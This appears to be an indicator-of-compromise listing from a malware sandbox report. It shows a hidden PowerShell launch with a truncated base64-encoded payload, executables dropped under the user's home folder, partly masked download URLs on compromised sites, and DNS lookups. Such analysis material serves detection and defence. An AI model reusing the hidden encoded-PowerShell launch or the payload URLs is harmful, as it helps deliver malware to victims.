Technical Information
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -windowstyle hidden -ENCOD IAAkAG8AaABGAD0AWwB0AFkAcABFAF0AKAAiAHsAMQB9AHsAMAB9AHsANAB9AHsAMgB9AHsAMwB9ACIAIAAtAEYAJwBzACcALAAnAFMAWQAnACwAJwBlAE0ALgBpAE8ALgBEAEkAcgBlAEMAVABPAC...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1528
- %TEMP%\1172893.cvr
- %HOMEPATH%\djl8wko\ia2zjin\lu7c99t.exe
- %HOMEPATH%\djl8wko\ia2zjin\lu7c99t.exe
- %HOMEPATH%\djl8wko\ia2zjin\lu7c99t.exe
- http://in###hngoc.com/wp-admin/K/
- http://www.an###thinh.com/autotoxication/96F/
- http://www.me##zs.com/wp-includes/p6/
- DNS ASK in###hngoc.com
- DNS ASK an###thinh.com
- DNS ASK me##zs.com
- DNS ASK da###eel.com
- DNS ASK zh###ng.store
- DNS ASK au###alaqua.com
- DNS ASK nu###rkaz.org